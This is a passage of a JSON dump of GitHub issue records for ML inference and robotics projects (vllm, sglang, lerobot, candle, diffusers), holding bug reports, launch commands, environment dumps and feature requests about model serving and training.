rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_notify hwp_act_window hwp_epp hwp_pkg_req hfi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm uintr md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 192 MiB (96 instances)\nL3 cache: 640 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-47,96-143\nNUMA node1 CPU(s): 48-95,144-191\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user point", "url": "https://github.com/vllm-project/vllm/issues/31574", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-31T10:33:52Z", "updated_at": "2026-01-01T07:09:51Z", "comments": 1, "user": "AIR-hl" }, { "repo": "sgl-project/sglang", "number": 16220, "title": "GLM PD disaggregation with MTP", "body": "Does GLM support PD disaggregation together with MTP? I tried to test it, but the accept len in the log is always 1 (it fails to predict every time) and performance is bad. I use the start commands below; is there something wrong?\n\n\nargs for prefill node:\nSGLANG_ENABLE_SPEC_V2=1 SGLANG_DISAGGREGATION_QUEUE_SIZE=1 SGLANG_DISAGGREGATION_THREAD_POOL_SIZE=1 MC_TE_METRIC=1 SGLANG_SET_CPU_AFFINITY=true python -m sglang.launch_server --model /models/GLM-4.6-FP8/ --trust-remote-code --watchdog-timeout \"1000000\" --mem-fraction-static 0.8 --max-running-requests 40 --disaggregation-mode prefill --tp-size 8 --kv-cache-dtype fp8_e4m3 --host 0.0.0.0 --chunked-prefill-size 16384 --attention-backend fa3 --enable-metrics --disaggregation-ib-device mlx5_0 --page-size 64 --speculative-algorithm NEXTN --speculative-num-steps 3 --speculative-eagle-topk 1 --speculative-num-draft-tokens 4\n\nargs for decode node:\nSGLANG_ENABLE_SPEC_V2=1 SGLANG_CLIP_MAX_NEW_TOKENS_ESTIMATION=512 SGLANG_SET_CPU_AFFINITY=true python -m sglang.launch_server --model /models/GLM-4.6-FP8/ --trust-remote-code --watchdog-timeout \"1000000\" --mem-fraction-static 0.9 --tp-size 8 --kv-cache-dtype fp8_e4m3 --disaggregation-mode decode --prefill-round-robin-balance --host 0.0.0.0 --chunked-prefill-size 16384 --attention-backend fa3 --max-running-requests 80 --enable-metrics --disaggregation-ib-device mlx5_0 --page-size 64 --speculative-algorithm NEXTN --speculative-num-steps 3 --speculative-eagle-topk 1 --speculative-num-draft-tokens 4", "url": "https://github.com/sgl-project/sglang/issues/16220", "state": "open", "labels": [], "created_at": "2025-12-31T10:19:04Z", "updated_at": "2026-01-04T01:52:56Z", "comments": 1, "user": "dongliangwu" }, { "repo": "vllm-project/vllm", "number": 31567, "title": "[RFC]: Why is custom_mask not exposed on FlashInfer to enable more flexible use cases?", "body": "### Motivation.\n\nLike what tensorrt-llm does 
https://github.com/NVIDIA/TensorRT-LLM/blob/6c1abf2d45c77d04121ebe10f6b29abf89373c60/tensorrt_llm/_torch/attention_backend/flashinfer.py#L411C17-L411C28\n\n### Proposed Change.\n\nExpose the custom_weight to support use cases like relative attention bias.\n\n### Feedback Period.\n\n_No response_\n\n### CC List.\n\n_No response_\n\n### Any Other Things.\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31567", "state": "open", "labels": [ "RFC" ], "created_at": "2025-12-31T06:00:07Z", "updated_at": "2025-12-31T06:00:07Z", "comments": 0, "user": "npuichigo" }, { "repo": "vllm-project/vllm", "number": 31564, "title": "[Bug]: Qwen3-VL-8B-Instruct has accuracy issue - Multi modal accuracy issue", "body": "### Your current environment\n\n**Current input format:**\n\nmessages = [\n    {\"role\": \"system\", \"content\": system_prompt},\n    {\n        \"role\": \"user\",\n        \"content\": [\n            {\"type\": \"text\", \"text\": user_prompt},\n            {\n                \"type\": \"image_url\",\n                \"image_url\": {\"url\": image_data_uri}\n            }\n        ]\n    }\n]\n\n**Command:**\n\npython3 -m vllm serve Qwen/Qwen3-VL-8B-Instruct --max-model-len 22528 --gpu-memory-utilization 0.75 --dtype float16 --port 7001 --trust-remote-code --limit-mm-per-prompt.video 0 --mm-encoder-tp-mode data --mm-processor-cache-gb 0 --tensor-parallel-size 1\n\n**Issue:**\nI have an ID number in a fax form, like 12347777568, and the model extracted it as 1234777568. The model skipped a 7: the number contains four 7s, but the model returns only three 7s in the output.\n\n**How to fix this?**\n1. Can I increase the max pixels to 2048 or something else?\n2. 
Can I tweak the sampling parameters to allow repeated tokens (top_p = 1 and top_k = 0.001, something like that)?\n\n**Current Sampling:**\n\"top_k\": 20,\n\"top_p\": 0.8,\n\"repetition_penalty\": 1.0,\n\"temperature\": 0.0\n\n### \ud83d\udc1b Describe the bug\n\nHow do I fix this issue?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31564", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-31T05:13:32Z", "updated_at": "2026-01-02T04:29:14Z", "comments": 3, "user": "Dineshkumar-Anandan-ZS0367" }, { "repo": "huggingface/lerobot", "number": 2737, "title": "SARM with PI05: Why is training loss getting noisier?", "body": "### Ticket Type\n\n\u2753 Technical Question\n\n### Environment & System Info\n\n```Shell\n\n```\n\n### Description\n\n[SARM with pi05 training for folding towel task _ fold_towel_v3_0 \u2013 Weights & Biases.pdf](https://github.com/user-attachments/files/24389716/SARM.with.pi05.training.for.folding.towel.task._.fold_towel_v3_0.Weights.Biases.pdf)\n\n### Context & Reproduction\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [ ] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2737", "state": "closed", "labels": [ "question", "training" ], "created_at": "2025-12-31T03:20:16Z", "updated_at": "2026-01-02T08:01:25Z", "user": "xianglunkai" }, { "repo": "huggingface/lerobot", "number": 2736, "title": "Questions about VLA multi-task training.", "body": "### Ticket Type\n\n\ud83d\udca1 Feature Request / Improvement\n\n### Environment & System Info\n\n```Shell\n- LeRobot version: 0.4.2\n- Platform: Linux-5.15.0-52-generic-x86_64-with-glibc2.31\n- Python version: 3.10.18\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- FFmpeg version: 6.1.1\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: NVIDIA GeForce RTX 4060 Ti\n- Using GPU in script?: \n- lerobot scripts: ['lerobot-calibrate', 'lerobot-dataset-viz', 'lerobot-edit-dataset', 'lerobot-eval', 'lerobot-find-cameras', 'lerobot-find-joint-limits', 'lerobot-find-port', 'lerobot-imgtransform-viz', 'lerobot-info', 'lerobot-record', 'lerobot-replay', 'lerobot-setup-motors', 'lerobot-teleoperate', 'lerobot-train']\n```\n\n### Description\n\nThe generalization capability of VLA mainly comes from pre-training based on large-scale data, but fine-tuning with multi-task co-training also yields good results. This point has been discussed in both the SmolVLA paper and on [Discord](https://discord.com/channels/1216765309076115607/1407325244980727850/1422249462025289809).\n\n\"Image\"\nHowever, the current fine-tuning commands and scripts are based on single-task scenarios. I would like to know how to implement multi-task fine-tuning within the lerobot framework. 
For example, using it on SmolVLA and pi0.5.\n\n### Context & Reproduction\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [x] I am using the latest version of the `main` branch.\n- [x] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2736", "state": "open", "labels": [ "enhancement", "question", "examples", "training" ], "created_at": "2025-12-31T03:12:02Z", "updated_at": "2026-01-04T20:02:02Z", "user": "yquanli" }, { "repo": "vllm-project/vllm", "number": 31555, "title": "[Docs] Feedback for `/en/stable/`MONSTERDOG", "body": "### \ud83d\udcda The doc issue\n\n[Projets (1).csv](https://github.com/user-attachments/files/24389184/Projets.1.csv)\n[Projets.csv](https://github.com/user-attachments/files/24389185/Projets.csv)\n[MonsterDog_Pilot_ROI_ISO42001_Report.pdf](https://github.com/user-attachments/files/24389187/MonsterDog_Pilot_ROI_ISO42001_Report.pdf)\n[MonsterDog_Pilot_ROI_ISO42001_Report.pdf](https://github.com/user-attachments/files/24389186/MonsterDog_Pilot_ROI_ISO42001_Report.pdf)\n[LIVRE_BLANC_MONSTERDOG_VINF.md](https://github.com/user-attachments/files/24389188/LIVRE_BLANC_MONSTERDOG_VINF.md)\n[MONSTERDOG_TOTALITY_SUPREME_INFINITY.py](https://github.com/user-attachments/files/24389189/MONSTERDOG_TOTALITY_SUPREME_INFINITY.py)\n[SCRIPT_ULTIME_FINAL_vULT_FULL.md](https://github.com/user-attachments/files/24389190/SCRIPT_ULTIME_FINAL_vULT_FULL.md)\n[RAPPORT_FINAL_MONSTERDOG.md](https://github.com/user-attachments/files/24389191/RAPPORT_FINAL_MONSTERDOG.md)\n\"Image\"\n[safe_hold_v1_1.py](https://github.com/user-attachments/files/24389193/safe_hold_v1_1.py)\n[safe_hold_v1_1.py](https://github.com/user-attachments/files/24389192/safe_hold_v1_1.py)\n[\u2605MONSTERDOG\u2605OMNI\u2605AEGIS\u26052026.py](https://github.com/user-attachments/files/24389194/MONSTERDOG.OMNI.AEGIS.2026.py)\n\n### Suggest a potential alternative/fix\n\n[MonsterDog_Pilot_ROI_ISO42001_Report.pdf](https://github.com/user-attachments/files/24389173/MonsterDog_Pilot_ROI_ISO42001_Report.pdf)\n[MonsterDog_Pilot_ROI_ISO42001_Report.pdf](https://github.com/user-attachments/files/24389172/MonsterDog_Pilot_ROI_ISO42001_Report.pdf)\n[LIVRE_BLANC_MONSTERDOG_VINF.md](https://github.com/user-attachments/files/24389174/LIVRE_BLANC_MONSTERDOG_VINF.md)\n[MONSTERDOG_TOTALITY_SUPREME_INFINITY.py](https://github.com/user-attachments/files/24389175/MONSTERDOG_TOTALITY_SUPREME_INFINITY.py)\n[SCRIPT_ULTIME_FINAL_vULT_FULL.md](https://github.com/user-attachments/files/24389176/SCRIPT_ULTIME_FINAL_vULT_FULL.md)\n[RAPPORT_FINAL_MONSTERDOG.md](https://github.com/user-attachments/files/24389177/RAPPORT_FINAL_MONSTERDOG.md)\n[safe_hold_v1_1.py](https://github.com/user-attachments/files/24389178/safe_hold_v1_1.py)\n[safe_hold_v1_1.py](https://github.com/user-attachments/files/24389179/safe_hold_v1_1.py)\n[\u2605MONSTERDOG\u2605OMNI\u2605AEGIS\u26052026.py](https://github.com/user-attachments/files/24389180/MONSTERDOG.OMNI.AEGIS.2026.py)\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31555", "state": "closed", "labels": [ 
"documentation" ], "created_at": "2025-12-31T01:20:55Z", "updated_at": "2025-12-31T05:18:48Z", "comments": 0, "user": "s33765387-cpu" }, { "repo": "huggingface/lerobot", "number": 2735, "title": "Buy the camera?", "body": "Hi! Where do I buy the camera and the whole SO-ARM101 kit? \n\nI find the kit at a chinese website like WoWRobo Robotics with only Paypal payment. But is that it? How do I buy the camera otherwise?", "url": "https://github.com/huggingface/lerobot/issues/2735", "state": "open", "labels": [ "question", "sensors" ], "created_at": "2025-12-30T22:32:42Z", "updated_at": "2025-12-30T22:51:39Z", "user": "JFI12" }, { "repo": "huggingface/candle", "number": 3272, "title": "Added support for Vulkan, any interest?", "body": "I have a Intel Arc A770 16GB GPU and wanted to use it with candle. \nI took niklasha's work on niklas-vulkan-2 branch cherry-pick's into the current main branch.\nI (when I say I, I mean I was the navigator, Codex 5.2 max did the work) added the following:\n\nAdded Vulkan queue-family selection and synchronize() so VulkanDevice uses compute-capable queues and can block on GPU work (device.rs).\nExpanded Vulkan storage surface with raw_buffer() access for kernel dispatch and fixed error wiring (storage.rs).\nWired Vulkan kernel registry to include matmul, norms, softmax, masked softmax, and quantized kernels (lib.rs).\nAdded F32/F16 matmul shader stubs and norm/softmax shaders for initial Vulkan ops coverage (*.comp).\nImplemented Vulkan masked softmax and staged SDPA path with GQA support in candle-nn (ops.rs).\nAdded Vulkan smoke tests and masked softmax correctness test (vulkan_smoke_tests.rs, vulkan_masked_softmax.rs).\nFixed missing imports and push-constant binding for Vulkan command execution (storage.rs).\nAdded bytemuck + vulkano-shaders feature wiring for Vulkan builds (Cargo.toml).\nIntroduced QVulkanStorage backed by raw byte buffers with dequantize/quantize helpers (vulkan.rs).\nAdded Vulkan quantized matmul kernels for Q5_0 and Q8_0 (naive, F32 output) (qmatmul_q5_0_f32.comp, qmatmul_q8_0_f32.comp).\nHooked Vulkan quantized path into QTensor forward and added Vulkan quantized tests (mod.rs, vulkan_quantized_tests.rs).\nAdded a dequantize\u2011fallback backward path for QLoRA-style gradients (mod.rs).\nCleaned up dummy Vulkan stubs to match new quantized API surface (dummy_vulkan.rs).\nFixed multiple test harness macro/feature mismatches to compile with Vulkan enabled (test_utils.rs, *.rs).", "url": "https://github.com/huggingface/candle/issues/3272", "state": "open", "labels": [], "created_at": "2025-12-30T02:58:27Z", "updated_at": "2025-12-30T03:00:12Z", "comments": 0, "user": "davidwynter" }, { "repo": "vllm-project/vllm", "number": 31515, "title": "[Feature]: need scheduler solution with high priority to process prefill", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nI have a model situiation which is that the model just care about the throughtput not care about the time delay, so I need a schedule solution which can get the high priority to process prefill and after all prefill is finished in the batch and then process the decode, this solution can increase the decode batch_size at the best. 
I need this feature to be supported in vllm-ascend.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31515", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-30T02:09:35Z", "updated_at": "2025-12-30T02:09:35Z", "comments": 0, "user": "184603418" }, { "repo": "vllm-project/vllm", "number": 31486, "title": "[Feature]: GLM 4.7 vocab padding feature", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nThe number of attention heads in GLM-4.7 is 96, so I\u2019m trying to run the FP8 version with 6\u00d7 H20 GPUs using tensor parallelism (tp=6).\n\nHowever, vllm serve fails due to `151552 cannot be divided by 6`.\n\nThis seems to be caused by the vocab size 151552 not being divisible by the TP size. In my understanding, this could be solvable by padding the vocab size up. \n\nAlternatively, is there any simpler workaround or recommended solution for this case? Thanks!\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31486", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-29T09:30:35Z", "updated_at": "2026-01-06T02:45:22Z", "comments": 3, "user": "H100-H200-B200" }, { "repo": "vllm-project/vllm", "number": 31484, "title": "[Usage]: RuntimeError when running Qwen2.5-VL-7B-Instruct with vllm: Potential version incompatibility", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.2 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 | packaged by Anaconda, Inc. 
| (main, Oct 21 2025, 20:16:04) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-6.8.0-53-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA B200\nGPU 1: NVIDIA B200\nGPU 2: NVIDIA B200\nGPU 3: NVIDIA B200\nGPU 4: NVIDIA B200\nGPU 5: NVIDIA B200\nGPU 6: NVIDIA B200\nGPU 7: NVIDIA B200\n\nNvidia driver version : 570.148.08\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 144\nOn-line CPU(s) list: 0-143\nVendor ID: GenuineIntel\nBIOS Vendor ID: Intel(R) Corporation\nModel name: Intel(R) Xeon(R) 6960P\nBIOS Model name: Intel(R) Xeon(R) 6960P CPU @ 2.7GHz\nBIOS CPU family: 179\nCPU family: 6\nModel: 173\nThread(s) per core: 1\nCore(s) per socket: 72\nSocket(s): 2\nStepping: 1\nBogoMIPS: 5400.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect user_shstk avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hfi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr ibt amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nL1d cache: 6.8 MiB (144 instances)\nL1i cache: 9 MiB (144 instances)\nL2 cache: 288 MiB (144 instances)\nL3 cache: 864 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-71\nNUMA node1 CPU(s): 72-143\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; RSB filling; PBRSB-eIBRS Not affected; BHI BHI_DIS_S\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==========", "url": "https://github.com/vllm-project/vllm/issues/31484", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-29T08:36:11Z", "updated_at": 
"2025-12-30T02:40:38Z", "comments": 1, "user": "puyuan1996" }, { "repo": "huggingface/diffusers", "number": 12899, "title": "Training script of z-image controlnet?", "body": "Can diffusers provide training script of z-image controlnet? ", "url": "https://github.com/huggingface/diffusers/issues/12899", "state": "open", "labels": [], "created_at": "2025-12-29T08:30:09Z", "updated_at": "2025-12-29T08:30:09Z", "comments": 0, "user": "universewill" }, { "repo": "vllm-project/vllm", "number": 31480, "title": "[Usage]: run deepseek v3.2 failed", "body": "### Your current environment\n\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 3.22.1\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 | packaged by Anaconda, Inc. | (main, Oct 21 2025, 20:16:04) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.15.0-78-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 1: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 2: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 3: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 4: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 5: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 6: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 7: NVIDIA RTX PRO 6000 Blackwell Server Edition\n\nNvidia driver version : 580.95.05\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.8.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 208\nOn-line CPU(s) list: 0-207\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Platinum 8470Q\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 52\nSocket(s): 2\nStepping: 8\nCPU max MHz: 3800.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb 
cat_l3 cat_l2 cdp_l3 invpcid_single intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 4.9 MiB (104 instances)\nL1i cache: 3.3 MiB (104 instances)\nL2 cache: 208 MiB (104 instances)\nL3 cache: 210 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-51,104-155\nNUMA node1 CPU(s): 52-103,156-207\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerabili", "url": "https://github.com/vllm-project/vllm/issues/31480", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-29T07:33:04Z", "updated_at": "2025-12-29T07:33:04Z", "comments": 0, "user": "ljwps" }, { "repo": "vllm-project/vllm", "number": 31479, "title": "[Feature]: Enable LoRA support for tower and connector in more MM models", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nRegarding multi-modal models, we have supported adding LoRA to the tower encoder and connector, see: #26674, but have only implemented it for a few models (`Qwen VL series` and `idefics3`). There is no reason not to support other multi-modal models. \n\n### Solution\n\nFor the remaining models where we want to support adding LoRA to the tower encoder and connector, we need to implement the following 2 functions:\n\n`get_num_mm_encoder_tokens`\n`get_num_mm_connector_tokens`\n\n**The root cause why we need to implement these two functions is:** the number of multi-modal tokens represented in the language model does not necessarily match the input length required by the linear layers in the vision tower or connector. 
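\n\nAs a hedged illustration (hypothetical numbers for a connector that spatially merges 2x2 patches; not any specific model's real ratios), the two helpers essentially encode this kind of mapping:\n\n```python\nMERGE_FACTOR = 4  # illustrative: 2x2 spatial merge in the connector\n\ndef get_num_mm_encoder_tokens(num_lm_mm_tokens: int) -> int:\n    # Input length seen by the vision tower's linear layers per image.\n    return num_lm_mm_tokens * MERGE_FACTOR\n\ndef get_num_mm_connector_tokens(num_lm_mm_tokens: int) -> int:\n    # The connector's linear layers consume tower-resolution tokens\n    # before the spatial merge shrinks them for the language model.\n    return num_lm_mm_tokens * MERGE_FACTOR\n```\n\n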
Since the lora_mapping requires the precise input token length prior to activation, these helper functions are necessary to bridge the discrepancy and calculate the correct lengths.\n\n### List of models that are completed or WIP\n\n\n- Qwen VL series: #26674\n- idefics3: #26674\n- LLaVA: https://github.com/vllm-project/vllm/pull/31513\n- BLIP2: https://github.com/vllm-project/vllm/pull/31620\n- GLM4: https://github.com/vllm-project/vllm/pull/31652\n- PaliGemma: https://github.com/vllm-project/vllm/pull/31656\n- H2OVL: https://github.com/vllm-project/vllm/pull/31696\n- Pixtral: https://github.com/vllm-project/vllm/pull/31724\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31479", "state": "open", "labels": [ "help wanted", "feature request" ], "created_at": "2025-12-29T07:28:52Z", "updated_at": "2026-01-06T02:03:29Z", "comments": 4, "user": "jeejeelee" }, { "repo": "vllm-project/vllm", "number": 31474, "title": "[Feature]: GLM 4.7 vocab padding feature", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nThe number of attention heads in GLM-4.7 is 96, so I\u2019m trying to run the FP8 version with 6\u00d7 H20 GPUs using tensor parallelism (tp=6).\n\nHowever, vllm serve fails due to `151552 cannot be divided by 6`.\n\nThis seems to be caused by the vocab size 151552 not being divisible by the TP size. In my understanding, this could be solvable by padding the vocab size up. \n\nAlternatively, is there any simpler workaround or recommended solution for this case? Thanks!\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31474", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-12-29T04:55:28Z", "updated_at": "2025-12-29T09:28:17Z", "comments": 0, "user": "H100-H200-B200" }, { "repo": "vllm-project/vllm", "number": 31469, "title": "[Feature]: Optimize the definition of the fake function in the code.", "body": 